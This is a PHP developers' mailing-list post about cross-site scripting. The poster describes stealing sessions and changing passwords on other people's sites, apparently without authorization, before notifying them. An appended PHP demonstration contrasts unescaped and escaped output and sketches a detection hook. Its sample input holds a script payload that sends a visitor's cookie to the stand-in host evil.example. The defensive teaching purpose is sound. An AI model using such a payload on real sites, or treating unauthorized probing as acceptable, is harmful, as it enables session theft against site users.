Rasmus Lerdorf <[EMAIL PROTECTED]> wrote... :

> this would likely have different security policies, but I do think a 
> general hook is something that would be useful to all of PHP.
> 
> A huge number of web apps today are extremely vulnerable to
> cross-site-scripting attacks.  Occasionally developers remember to clean
> their data before displaying it, but for the most part they don't.  Take
> half an hour and find yourself a collection of sites where you can enter
> data that is somehow displayed back to you.  Shopping carts that ask for
> your name and phone number, or half of php.net's own stuff.  Stick a bit
> of javascript in your phone number and watch.


Just a little note here.

The government project I am working on was attacked on New Year's night
with XSS. Therefore, after we fixed it we decided to see what else is
vulnerable out there.

During the last two weeks I have played with a variety of
sites/portals/apps trying to hack them to see how far I can go. I ended
up stealing the sessions of any **** installations, changing the
passwords on **** main website and could see the list of passwords in
plain user:pass format assigned as a cookie to anyone who sees my message
on ***.

Now, every *** was notified by me and, till they all will fix these, I
will try not to reveal their names.

What I think PHP should have is a function or a whole extension which
parses the output in various ways cleaning XSS in it.

Also, having such functionality in PHP would help it look more secure,
as XSS affects any programming language and not many have such
protections.



--
Maxim Maletsky
[EMAIL PROTECTED]



-- 
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, visit: http://www.php.net/unsub.php
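The phone-number attack Rasmus describes, the output escaping that stops it, and a sketch of the "general hook" Maxim asks for, as an added example that is not code from this thread or from PHP itself. The submitted values, the field names and the function names (render_vulnerable, render_hardened, e, js_string, reflected_input_hook) are constructed for the demonstration.

```php
<?php
declare(strict_types=1);

/*
 * Added example, not code from the thread. Shows the phone-number XSS the
 * message describes, per-context escaping that fixes it, and a sketch of a
 * "general hook" built on ob_start(), together with its limits. All input
 * values are constructed; the function names are hypothetical.
 */

// Constructed submission: the attack from the message.
$submitted = [
    'name'  => 'Alice',
    'phone' => '555-0100<script>new Image().src="http://evil.example/?c="+document.cookie</script>',
];

// --- Vulnerable: reflects user data straight into the page ------------------
function render_vulnerable(array $row): string
{
    // The browser parses the injected <script> element and runs it with the
    // page's origin, so document.cookie is the victim's session.
    return "<p>Name: {$row['name']}<br>Phone: {$row['phone']}</p>";
}

// --- Hardened: escape for the context the value lands in --------------------
function e(string $value): string
{
    // ENT_QUOTES escapes ' and " so the value is also safe inside attributes;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function js_string(string $value): string
{
    // A value inside a <script> block needs JSON encoding with HTML-sensitive
    // characters hex-escaped; HTML entities would be the wrong encoding there.
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

function render_hardened(array $row): string
{
    return '<p>Name: ' . e($row['name']) . '<br>Phone: ' . e($row['phone']) . '</p>'
         . '<script>var phone = ' . js_string($row['phone']) . ';</script>';
}

// --- Sketch of a "general hook": watch the output buffer for reflected input --
// Running htmlspecialchars() over the whole buffer would also mangle the page's
// own markup, because the hook cannot know which bytes are template and which
// are data. So this hook only detects request values that reach the output raw
// and logs them; the real fix is still escaping at each output point above.
function reflected_input_hook(string $buffer): string
{
    foreach ($_REQUEST as $name => $value) {
        if (is_string($value)
            && strpbrk($value, '<>"\'') !== false   // contains markup characters
            && strpos($buffer, $value) !== false) {  // and appears verbatim in output
            error_log("possible XSS: request parameter '$name' reflected unescaped");
        }
    }
    return $buffer;
}

$_REQUEST = $submitted;            // simulate the POST for the demo
ob_start('reflected_input_hook');  // callback runs once, when the buffer is flushed
echo render_vulnerable($submitted), PHP_EOL;   // raw <script> reaches the page
echo render_hardened($submitted), PHP_EOL;     // entity- and JSON-encoded instead
ob_end_flush();                    // hook logs one warning, caused by the first echo
```

Run it with `php example.php`: the first line printed still carries the live `<script>` element, the second carries `&lt;script&gt;` in the HTML and `\u003Cscript\u003E` inside the JavaScript string, and the hook writes one "possible XSS" line to the error log. The point of the hook is that an output filter can only guess at context, which is why it detects rather than rewrites.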